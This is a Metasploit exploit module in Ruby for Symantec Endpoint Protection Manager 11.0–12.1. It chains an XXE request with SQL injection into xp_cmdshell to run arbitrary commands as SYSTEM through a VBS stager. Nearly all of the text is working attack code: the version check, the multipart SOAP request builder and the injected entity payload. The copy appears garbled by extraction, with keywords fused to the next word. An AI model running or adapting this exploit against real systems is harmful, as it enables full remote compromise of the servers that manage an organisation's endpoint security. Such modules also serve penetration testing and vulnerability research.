|  
 require 'msf/core'
 require 'msf/core/exploit/powershell'
  
 classMetasploit3 < Msf::Exploit::Remote 
   Rank = ExcellentRanking 
  
   include REXML
   include Msf::Exploit::CmdStagerVBS 
   include Msf::Exploit::Remote::HttpClient 
  
   definitialize(info = {}) 
     super(update_info(info, 
       'Name'=> 'Symantec Endpoint Protection Manager Remote Command Execution', 
       'Description'=> %q{ 
         This moduleexploits XXEandSQLinjection flaws inSymantec Endpoint Protection Manager 
         versions 11.0, 12.0and12.1. When supplying a specially crafted XXErequest an attacker 
         can reach SQLinjection affected components. As xp_cmdshell is enabled inthe included 
         database instance, it's possible to execute arbitrary system commands on the remote system 
         with SYSTEMprivileges. 
       }, 
       'Author'=> 
         [ 
           'Stefan Viehbock', 
           'Chris Graham', 
           'xistence <xistence[at]0x90.nl>'
         ], 
       'License'=> MSF_LICENSE, 
       'References'=> 
         [ 
           [ 'CVE', '2013-5014'], 
           [ 'CVE', '2013-5015'], 
           [ 'EDB', '31853'], 
           [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt'] 
         ], 
       'Arch'=> ARCH_X86, 
       'Platform'=> 'win', 
       'Targets'=> 
         [ 
           ['Windows VBS Stager', {}] 
         ], 
       'Privileged'=> true, 
       'DisclosureDate'=> 'Feb 24 2014', 
       'DefaultTarget'=> 0)) 
  
     register_options( 
       [ 
         Opt::RPORT(9090), 
         OptString.new('TARGETURI', [true, 'The base path', '/']) 
       ], self.class) 
   end
  
   defcheck 
     res = send_request_cgi( 
       { 
         'uri'=>  normalize_uri(target_uri.path), 
         'method'=> 'GET', 
       }) 
  
     ifres && res.code == 200&& res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995- 2013Symantec Corporation/ 
       returnExploit::CheckCode::Appears 
     end
  
     Exploit::CheckCode::Safe 
   end
  
   defexploit 
     print_status("#{peer} - Sending payload") 
     
     execute_cmdstager({:linemax=> 3950}) 
   end
  
   defexecute_command(cmd, opts = {}) 
     
     command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
  
     
     seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
  
     soap = soap_request(seqnum, command) 
  
     post_data = Rex::MIME::Message.new
     post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"") 
     xxe = post_data.to_s 
  
     res = send_request_cgi( 
       { 
         'uri'=> normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 
         'method'=> 'POST', 
         'vars_get'=> { 'ActionType'=> 'ConsoleLog'}, 
         'ctype'=> "multipart/form-data; boundary=#{post_data.bound}", 
         'data'=> xxe, 
       }) 
  
     ifres andres.body !~ /ResponseCode/ 
       fail_with(Failure::Unknown, "#{peer} - Something went wrong.") 
     end
   end
  
   defsoap_request(seqnum, command) 
     randpayload = rand_text_alpha(8+rand(8)) 
     randxxe = rand_text_alpha(8+rand(8)) 
     entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
     entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
  
     xml = Document.new
     xml.add(DocType.new('sepm', "[ METASPLOIT ]")) 
     xml.add_element("Request") 
     xxe = xml.root.add_element(randxxe) 
     xxe.text = "PAYLOAD"
  
     xml_s = xml.to_s 
     xml_s.gsub!(/METASPLOIT/, entity) 
     xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding 
  
     xml_s 
   end
 
 |